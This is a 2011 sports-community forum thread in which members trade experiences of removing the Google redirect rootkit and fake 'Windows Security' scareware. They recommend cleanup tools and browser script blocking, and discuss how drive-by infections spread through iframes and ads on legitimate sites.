 |
07-11-2011, 10:37 AM
|
#1 | ||
|
Coordinator
Join Date: Jul 2003
Location: Here and There
|
Google Re-direct Virus?
Anyone have any experience with this? My computer has it. Apparently it's a real pain to remove and involves editing / deleting windows root files and registry settings. I'm technically capable, but wanted to see if anyone had gone through this process before and had any advice or an easier way before I start stripping out Windows system files. Thanks in advance!
|
||
|
|
|
07-11-2011, 10:40 AM
|
#2 |
|
Mascot
Join Date: Oct 2000
Location: Ohio
|
My Thinkpad caught this one. I was able to remove it by following instructions at bleepingcomputer.com
I've used that website a few times to remove different viruses. |
|
|
|
|
07-11-2011, 10:43 AM
|
#3 |
|
Hall Of Famer
Join Date: Dec 2003
Location: the yo'
|
had this motherfucker the other day. I think this was what i used. How to remove Google Redirects or the TDSS, TDL3, or Alureon rootkit using TDSSKiller
|
|
|
|
|
07-11-2011, 10:48 AM
|
#4 |
|
Hall Of Famer
Join Date: Nov 2000
Location: Behind Enemy Lines in Athens, GA
|
I heartily second the endorsement of bleepingcomputer.com walkthroughs.
Saved my ass from a nasty virus last Sunday night & then saved me again from a less painful version last night. The tools are linked for d'loading, the walkthroughs are not quite idiot level but they're close enough (thank God). Meanwhile I'm wondering why the hell my Avast has gone 0-2 on consecutive Sunday nights.
__________________
"I lit another cigarette. Unless I specifically inform you to the contrary, I am always lighting another cigarette." - from a novel by Martin Amis Last edited by JonInMiddleGA : 07-11-2011 at 10:49 AM. |
|
|
|
|
07-11-2011, 10:53 AM
|
#5 | |
|
Coordinator
Join Date: Dec 2004
Location: San Diego via Sausalito via San Jose via San Diego
|
Quote:
Was it a home or an away game? Natural grass or astroturf?
__________________
I'm no longer a Chargers fan, they are dead to me Coming this summer to a movie theater near you: The Adventures of Jedikooter: Part 4 |
|
|
|
|
|
07-11-2011, 11:09 AM
|
#6 | |
|
College Starter
Join Date: Oct 2000
|
Quote:
I also got the nasty bug on Saturday, and my Avast also whiffed. fwiw, I absolutely support torture for the asshats who write & disseminate these trojans.
__________________
... |
|
|
|
|
|
07-11-2011, 11:59 AM
|
#7 | |
|
Grizzled Veteran
Join Date: Sep 2003
Location: Fresno, CA
|
Quote:
You should view porn on more nights. Keep the whole system in practice. |
|
|
|
|
|
07-11-2011, 12:01 PM
|
#8 | |
|
Hall Of Famer
Join Date: Nov 2000
Location: Behind Enemy Lines in Athens, GA
|
Quote:
That's the damnable thing ... unless it was a time released virus, both incidents have occurred well outside the porn time zone.
__________________
"I lit another cigarette. Unless I specifically inform you to the contrary, I am always lighting another cigarette." - from a novel by Martin Amis |
|
|
|
|
|
07-11-2011, 12:02 PM
|
#9 | |
|
Hall Of Famer
Join Date: Nov 2000
Location: Behind Enemy Lines in Athens, GA
|
Quote:
Fake "Windows Security" bug?
__________________
"I lit another cigarette. Unless I specifically inform you to the contrary, I am always lighting another cigarette." - from a novel by Martin Amis |
|
|
|
|
|
07-11-2011, 12:09 PM
|
#10 | |
|
College Starter
Join Date: Oct 2000
|
Quote:
yep
__________________
... |
|
|
|
|
|
07-11-2011, 12:52 PM
|
#11 |
|
Hall Of Famer
Join Date: Dec 2003
Location: the yo'
|
The fake windows security bug was the same as the google redirect I think? I know I had both on different machines. I think we need to better utilize black ops troops to fix the people that make these problems.
|
|
|
|
|
07-11-2011, 01:18 PM
|
#12 |
|
College Benchwarmer
Join Date: Oct 2003
|
Don't have the bug but d'loaded the fix stevew linked just in case I need it.
Is this something no-script would block? How about winpatrol? Anyone know if it gets around the warnings that something is trying to be installed? |
|
|
|
07-11-2011, 01:30 PM
|
#13 | |
|
Hall Of Famer
Join Date: Dec 2002
Location: Mass.
|
Quote:
Yes, no script would block it if you didn't have it set to trust the site that the malicious web code would come from. Same with people who don't use firefox/noscript they could block this if they disabled scripting in their browser, but then to them many webpages would look "broken" most likely, so noscript is a more graceful approach. If people use noscript but blindly trust everything, or globally run scripting, they basically make no script worthless. Also by default noscript does not block iframes, so you need to enable that as most of these infections occur using iframes on legitimate websites. As for Winpatrol, hypothetically it -should- protect against it, but that depends more on how you have winpatrol set up most likely. Running a Winpatrol or similar product is a good idea, but the best way to protect against these type of attacks is blocking scripting/iframes in your browser. |
|
|
|
|
|
07-11-2011, 01:40 PM
|
#14 | |
|
College Benchwarmer
Join Date: Oct 2003
|
Quote:
Thanks. I don't even have fofc on trusted  and per your advice in other threads Iframes are blocked too. When I surf I only use the "temporarily allow" options in noscript. I had a bad virus years ago and took me a day and a half screwing around at comptercops with hijackthis to get rid of it. Since then I've been very conscious of where I go and what I allow. I'm sure at some time I'll get bit again but for now, for me, paranoid is better |
|
|
|
|
|
07-11-2011, 04:32 PM
|
#15 | |
|
High School JV
Join Date: Apr 2003
Location: Akron, OH
|
Quote:
I got this last week. When it popped up I hit crtl-alt-del and shut the browser down from there. That seemed to take care of it. At what point does it actually install the virus? |
|
|
|
|
|
07-11-2011, 04:43 PM
|
#16 |
|
Coordinator
Join Date: Oct 2000
|
ComboFix
|
|
|
|
|
07-11-2011, 05:10 PM
|
#17 | |
|
Hall Of Famer
Join Date: Nov 2000
Location: Behind Enemy Lines in Athens, GA
|
Quote:
Based on the hell I went through to fix the variant last weekend, it depends upon the variant. For example, the one I got 8 days ago overrode all displays while giving scary warning messages about hard disk errors, bad sectors, etc. It went so far as to hide certain files/file types to make it appear as though you had serious data loss. In the end there were over 300 different images associated with the virus, each with a different "windows message" warning you about the warning (fake) problems. When the hell this thing installed, how the hell it installed without me ever seeing it/approving it, etc ... no clue. Considering how often I'm prompted to verify installation/overwriting, etc. etc. I would have thought this would have been next to impossible w/out user (i.e. me) taking some action but apparently that isn't the case. The version I got last night was simpler & less scary but no less troublesome as a user. It did something in the registry that prevented virtually any executable from running. No web browser, no anti-viral, no d'loading, nothing. It basically blocked any operation (on Win XP) other than popping up a full screen "windows message" warning me that I was at risk & needed to purchase/install a "Windows Security" program. After getting through all the fixes & sitting through the 3 hours it takes for Malwarebytes to run a full scan, it was a total of 7 files/registry entries (including one java file in my web temp folder that I would guess was tied to the origin of the virus). Once again, no clue where/how/when the trojan came from, got installed, etc. Oddly enough, both incidents reared their heads on Sunday night around 11pm. Now either they both were "time-released" (or whatever the terminology) for the same time OR I got them from a major newspaper website since that's where I was when I discovered the one last night & where I had been a relative short time before the problem emerged the previous week.
__________________
"I lit another cigarette. Unless I specifically inform you to the contrary, I am always lighting another cigarette." - from a novel by Martin Amis |
|
|
|
|
|
07-11-2011, 05:24 PM
|
#18 | |
|
College Starter
Join Date: Oct 2000
|
Quote:
That's exactly where I was when I got it on Saturday - some british tabloid linked from drudge. At least that's where i was when all hell broke loose.
__________________
... |
|
|
|
|
|
07-11-2011, 05:46 PM
|
#19 | |
|
Hall Of Famer
Join Date: Dec 2002
Location: Mass.
|
Quote:
Because the gross majority of web users do not block scripting in their browsers, this is the most common method of infecting systems these days (several million infections every day). The hackers now actually spend time trying to hack legitimate websites (such as CNN, wall street journal, etc) to slip in code that is usually not even visible (via iframe). Then when your browser hits that site, it unknowingly also downloads the rogue code and if your system is not properly patched or protected against it will then infect your system. Several months ago, even FOFC was infecting people through this means, what the hackers did was inject the attack into one of the advertisements on the top of our boards. So it wouldn't surprise me at all if you got something from a major website these days, the list of major companies and sites attacked by this manner are enormous. |
|
|
|
|
|
07-11-2011, 06:53 PM
|
#20 |
|
College Benchwarmer
Join Date: Apr 2008
Location: Sterling Heights, Mi
|
I've seen the "Windows Security" quite a bit this year. My wife got it on her laptop and I have fixed it on a couple of my friend's computers. Combination of following the steps on bleepingcomputer and malwarebytes seems to do the job.
As a side note, all of these computers had anti-virus on them, none of them caught it. A couple of the computers had Microsoft Security Essentials, 1 had Avast!, one had AVG Free Edition, and one had McAfee. Last edited by fantom1979 : 07-11-2011 at 06:54 PM. |
|
|
|
|
07-11-2011, 07:07 PM
|
#21 | |
|
Hall Of Famer
Join Date: Nov 2000
Location: Behind Enemy Lines in Athens, GA
|
Quote:
Okay, that part I kind of get/knew already. What has me thrown is that, in my mind at least, the point to that method would be infecting on a larger scale. Considering all the things people complain very loudly about, I'm having a tough time picturing ajc.com being used for virus delivery without hearing something about it somewhere. Hell, that's the kind of thing I figure would produce three FB pages, a Twitter feed, and two websites just to protest it. (Just explaining why I've previously discounted them in spite of being the most obvious suspect because of proximity of visit to infection).
__________________
"I lit another cigarette. Unless I specifically inform you to the contrary, I am always lighting another cigarette." - from a novel by Martin Amis |
|
|
|
|
|
07-11-2011, 11:02 PM
|
#22 |
|
Grizzled Veteran
Join Date: Jul 2001
Location: St. Louis
|
I got this mother fucker a few weeks ago also. Wonder if maybe it isn't from those FOFC ad's?
It was a work laptop so I wasn't anywhere unsafe with it. I had also just backed up my data so I just had the computer guy reinstall windows. Last edited by panerd : 07-11-2011 at 11:03 PM. |
|
|
|
|
07-11-2011, 11:10 PM
|
#23 | |
|
Hall Of Famer
Join Date: Nov 2000
Location: Behind Enemy Lines in Athens, GA
|
Quote:
Only if it can be delivered by those even if we never see them.
__________________
"I lit another cigarette. Unless I specifically inform you to the contrary, I am always lighting another cigarette." - from a novel by Martin Amis |
|
|
|
|
|
07-12-2011, 03:49 PM
|
#24 | |
|
High School JV
Join Date: Apr 2003
Location: Akron, OH
|
Quote:
This is the one that popped up on me. I saw it doing its "fake" scan and must have stopped it before a virus was actually installed. |
|
|
|
|
 |
| Currently Active Users Viewing This Thread: 1 (0 members and 1 guests) | |
| Thread Tools | |
|
|
